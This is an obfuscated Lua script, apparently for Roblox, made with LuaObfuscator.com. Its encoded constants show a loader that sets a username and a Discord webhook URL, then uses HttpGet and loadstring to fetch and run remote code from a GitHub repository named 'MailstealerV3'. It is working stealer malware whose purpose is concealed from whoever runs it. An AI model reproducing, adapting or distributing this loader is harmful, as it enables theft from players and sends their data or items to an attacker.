--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v67=v2(v0(v30,16));if v19 then local v75=v5(v67,v19);v19=nil;return v75;else return v67;end end end);local function v20(v31,v32,v33)if v33 then local v68=0 -0 ;local v69;while true do if (v68==(0 -0)) then v69=(v31/(((3 + 0) -1)^(v32-(2 -1))))%(2^(((v33-(620 -(555 + 64))) -(v32-(932 -(857 + 74)))) + (569 -((1432 -(68 + 997)) + 201)))) ;return v69-(v69%((1322 -394) -(214 + (1983 -(226 + 1044))))) ;end end else local v70=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v70 + v70))>=v70) and ((3823 -2945) -(282 + 595))) or (1637 -(1523 + 114)) ;end end local function v21()local v34=117 -(32 + 85) ;local v35;while true do if (v34==(1 + 0)) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=1 -(0 -0) ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + (352 -(87 + 263)) );v18=v18 + (182 -(67 + 113)) ;return (v37 * 256) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (9 -(13 -8)) ;return (v41 * (12338840 + 4438376)) + (v40 * (260471 -194935)) + (v39 * (1208 -(802 + (272 -122)))) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=1 + 0 ;local v45=(v20(v43,998 -(915 + 36 + 46) ,20) * ((5 -3)^(19 + 13))) + v42 ;local v46=v20(v43,27 -6 ,1218 -(1069 + 118) );local v47=((v20(v43,32)==((3 -1) -(439 -(145 + 293)))) and  -(1 -0)) or (1 + 0) ;if (v46==(0 -0)) then if (v45==(0 + 0)) then return v47 * (791 -(368 + 423)) ;else v46=3 -2 ;v44=0;end elseif (v46==2047) then return ((v45==(18 -(10 + 8))) and (v47 * ((3 -(432 -(44 + 386)))/0))) or (v47 * NaN) ;end return v8(v47,v46-(1465 -(416 + 26)) ) * (v44 + (v45/(((1492 -(998 + 488)) -4)^52))) ;end local function v25(v48)local v49=0;local v50;local v51;while true do if (v49==(1 + 2)) then return v6(v51);end if (v49==(0 + 0 + 0)) then v50=nil;if  not v48 then v48=v23();if (v48==(772 -(201 + 202 + 369))) then return "";end end v49=1139 -(116 + (1907 -(261 + 624))) ;end if (v49==(8 -6)) then v51={};for v76=1 + 0 , #v50 do v51[v76]=v2(v1(v3(v50,v76,v76)));end v49=10 -7 ;end if (v49==(3 -(3 -1))) then v50=v3(v16,v18,(v18 + v48) -(860 -(814 + 45)) );v18=v18 + v48 ;v49=(1084 -(1020 + 60)) -2 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v52==2) then v57=nil;v58=nil;v52=124 -(17 + 104) ;end if (v52==3) then v59=nil;while true do local v78=0;while true do if (v78==(0 -0)) then if (v53~=0) then else local v100=0 + 0 ;local v101;while true do if (v100==(0 + 0)) then v101=0 -0 ;while true do if (v101==(0 -0)) then local v155=0;while true do if (v155~=(1 + 0)) then else v101=1637 -(1373 + 263) ;break;end if (v155~=(1000 -(451 + 549))) then else v54={};v55={};v155=1;end end end if (v101~=(1 + 0)) then else v56={};v57={v54,v55,nil,v56};v101=2;end if (v101==(1386 -(746 + 638))) then v53=1;break;end end break;end end end if (v53==(1 + 0)) then local v102=0;while true do if (v102==(0 -0)) then v58=v23();v59={};v102=342 -(218 + 123) ;end if (v102==1) then for v118=1582 -(1535 + 46) ,v58 do local v119=0 + 0 ;local v120;local v121;local v122;local v123;while true do if (v119==(1 + 0)) then v122=nil;v123=nil;v119=2;end if (v119~=2) then else while true do if ((560 -(306 + 254))==v120) then local v180=0;local v181;while true do if (v180==0) then v181=0;while true do if (v181~=(1 + 0)) then else v120=1;break;end if (v181==(0 -0)) then local v192=1467 -(899 + 568) ;while true do if (1~=v192) then else v181=1 + 0 ;break;end if (v192~=(0 -0)) then else v121=0;v122=nil;v192=604 -(268 + 335) ;end end end end break;end end end if (v120~=(291 -(60 + 230))) then else v123=nil;while true do if (v121~=0) then else local v183=572 -(426 + 146) ;local v184;while true do if (v183~=(0 + 0)) then else v184=0;while true do if (v184==1) then v121=1;break;end if (v184~=(1456 -(282 + 1174))) then else local v196=811 -(569 + 242) ;local v197;while true do if (v196==0) then v197=0 -0 ;while true do if (v197~=0) then else local v202=0;while true do if (v202~=0) then else v122=v21();v123=nil;v202=1 + 0 ;end if (v202==(1025 -(706 + 318))) then v197=1;break;end end end if (v197==(1252 -(721 + 530))) then v184=1272 -(945 + 326) ;break;end end break;end end end end break;end end end if (v121==1) then if (v122==(2 -1)) then v123=v21()~=0 ;elseif (v122==2) then v123=v24();elseif (v122==(3 + 0)) then v123=v25();end v59[v118]=v123;break;end end break;end end break;end if (v119==0) then v120=0;v121=nil;v119=1;end end end v57[3]=v21();v102=702 -(271 + 429) ;end if (v102~=(2 + 0)) then else v53=2;break;end end end v78=1;end if (1~=v78) then else if ((1502 -(1408 + 92))~=v53) then else for v103=1087 -(461 + 625) ,v23() do local v104=1288 -(993 + 295) ;local v105;local v106;while true do if (v104==0) then local v124=0 + 0 ;while true do if (v124==(1172 -(418 + 753))) then v104=1;break;end if (v124~=(0 + 0)) then else v105=0 + 0 ;v106=nil;v124=1;end end end if (v104~=(1 + 0)) then else while true do if (v105~=(0 + 0)) then else v106=v21();if (v20(v106,1,530 -(406 + 123) )==(1769 -(1749 + 20))) then local v173=0 + 0 ;local v174;local v175;local v176;local v177;while true do if (v173==2) then while true do if (v174==2) then local v186=0;local v187;while true do if (v186~=(1322 -(1249 + 73))) then else v187=0 + 0 ;while true do if ((1146 -(466 + 679))==v187) then v174=6 -3 ;break;end if (v187==(0 -0)) then local v198=0;while true do if (v198~=0) then else if (v20(v176,1901 -(106 + 1794) ,1 + 0 )==1) then v177[1 + 1 ]=v59[v177[5 -3 ]];end if (v20(v176,2,5 -3 )==1) then v177[3]=v59[v177[117 -(4 + 110) ]];end v198=1;end if (1==v198) then v187=585 -(57 + 527) ;break;end end end end break;end end end if (1~=v174) then else local v188=0;local v189;while true do if (v188==(1427 -(41 + 1386))) then v189=0;while true do if (v189==(103 -(17 + 86))) then local v199=0 + 0 ;local v200;while true do if (v199~=0) then else v200=0;while true do if (0~=v200) then else local v207=0;while true do if (1~=v207) then else v200=1;break;end if (v207==0) then v177={v22(),v22(),nil,nil};if (v175==0) then local v208=166 -(122 + 44) ;local v209;local v210;while true do if (v208~=(0 -0)) then else v209=0 -0 ;v210=nil;v208=1 + 0 ;end if (v208~=(1 + 0)) then else while true do if (v209==0) then v210=0 -0 ;while true do if (v210~=0) then else v177[3]=v22();v177[4]=v22();break;end end break;end end break;end end elseif (v175==(66 -(30 + 35))) then v177[3 + 0 ]=v23();elseif (v175==2) then v177[3]=v23() -((1259 -(1043 + 214))^(60 -44)) ;elseif (v175==(1215 -(323 + 889))) then local v213=0 -0 ;local v214;while true do if (v213==(580 -(361 + 219))) then v214=320 -(53 + 267) ;while true do if (v214==0) then v177[3]=v23() -(2^16) ;v177[1 + 3 ]=v22();break;end end break;end end end v207=414 -(15 + 398) ;end end end if (v200==(983 -(18 + 964))) then v189=3 -2 ;break;end end break;end end end if (v189==1) then v174=2 + 0 ;break;end end break;end end end if (v174==(0 + 0)) then local v190=850 -(20 + 830) ;while true do if (v190~=(1 + 0)) then else v174=1;break;end if (v190==(126 -(116 + 10))) then local v195=0 + 0 ;while true do if (v195~=0) then else local v201=738 -(542 + 196) ;while true do if (v201~=0) then else v175=v20(v106,2,3);v176=v20(v106,4,6);v201=1 -0 ;end if ((1 + 0)~=v201) then else v195=1;break;end end end if (v195~=(1 + 0)) then else v190=1 + 0 ;break;end end end end end if (v174==3) then if (v20(v176,3,7 -4 )==1) then v177[9 -5 ]=v59[v177[1555 -(1126 + 425) ]];end v54[v103]=v177;break;end end break;end if (0==v173) then local v182=0;while true do if (0~=v182) then else v174=0;v175=nil;v182=1;end if (v182==(406 -(118 + 287))) then v173=3 -2 ;break;end end end if (v173==1) then v176=nil;v177=nil;v173=2;end end end break;end end break;end end end for v107=1122 -(118 + 1003) ,v23() do v55[v107-1 ]=v28();end return v57;end break;end end end break;end if (1~=v52) then else local v71=0 -0 ;while true do if ((377 -(142 + 235))~=v71) then else v55=nil;v56=nil;v71=4 -3 ;end if (v71==1) then v52=1 + 1 ;break;end end end if (v52~=(977 -(553 + 424))) then else v53=0;v54=nil;v52=1 -0 ;end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==1) then v66=v60[3];return function(...)local v79=v64;local v80=v65;local v81=v66;local v82=v27;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v93=0,v87 do if (v93>=v81) then v85[v93-v81 ]=v86[v93 + 1 ];else v89[v93]=v86[v93 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do v91=v79[v83];v92=v91[1];if (v92<=5) then if (v92<=2) then if (v92<=0) then v89[v91[2]]=v91[3]~=0 ;elseif (v92>1) then v89[v91[2]]=v91[3];elseif ((v91[3]=="_ENV") or (v91[3]=="getfenv")) then v89[v91[2]]=v62;else v89[v91[2]]=v62[v91[3]];end elseif (v92<=3) then local v110=v91[2];v89[v110]=v89[v110](v13(v89,v110 + 1 ,v84));elseif (v92==4) then if (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end else do return;end end elseif (v92<=8) then if (v92<=6) then local v112=0;local v113;local v114;local v115;local v116;while true do if (v112==0) then v113=v91[2];v114,v115=v82(v89[v113](v13(v89,v113 + 1 ,v91[3])));v112=1;end if (v112==2) then for v160=v113,v84 do local v161=0;while true do if (v161==0) then v116=v116 + 1 ;v89[v160]=v114[v116];break;end end end break;end if (v112==1) then v84=(v115 + v113) -1 ;v116=0;v112=2;end end elseif (v92>7) then v83=v91[3];else local v128;local v129,v130;local v131;local v132;v62[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];if ((v91[3]=="_ENV") or (v91[3]=="getfenv")) then v89[v91[2]]=v62;else v89[v91[2]]=v62[v91[3]];end v83=v83 + 1 ;v91=v79[v83];if ((v91[3]=="_ENV") or (v91[3]=="getfenv")) then v89[v91[2]]=v62;else v89[v91[2]]=v62[v91[3]];end v83=v83 + 1 ;v91=v79[v83];v132=v91[2];v131=v89[v91[3]];v89[v132 + 1 ]=v131;v89[v132]=v131[v91[4]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v132=v91[2];v129,v130=v82(v89[v132](v13(v89,v132 + 1 ,v91[3])));v84=(v130 + v132) -1 ;v128=0;for v152=v132,v84 do v128=v128 + 1 ;v89[v152]=v129[v128];end v83=v83 + 1 ;v91=v79[v83];v132=v91[2];v89[v132]=v89[v132](v13(v89,v132 + 1 ,v84));v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]();v83=v83 + 1 ;v91=v79[v83];v83=v91[3];end elseif (v92<=10) then if (v92>9) then local v142=0;local v143;local v144;while true do if (v142==1) then v89[v143 + 1 ]=v144;v89[v143]=v144[v91[4]];break;end if (v142==0) then v143=v91[2];v144=v89[v91[3]];v142=1;end end else v62[v91[3]]=v89[v91[2]];end elseif (v92>11) then v89[v91[2]]();else v62[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v62[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v83=v91[3];end v83=v83 + 1 ;end end;end if (0==v63) then v64=v60[1];v65=v60[2];v63=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F030D3O004C6F6164696E675363722O656E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F45676F72696B7573612F4D61696C737465616C657256332F6D61696E2F6D61696E03083O00557365726E616D6503083O006F7269746531323003073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313938342O353433393832362O38363736382F494B6F4C57424453704D665369524C6B5661556C3938363457784C68375F796F654E554254562D5F547861414A396D4F34425870454C56745031684830434B712O415A6100163O0012023O00013O0026043O000D000100020004083O000D00014O00015O001207000100033O00122O000100043O00122O000200053O00202O00020002000600122O000400076O000200046O00013O00024O00010001000100044O001500010026043O0001000100010004083O00010001001202000100093O00120B000100083O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100012O00053O00017O00",v9(),...);
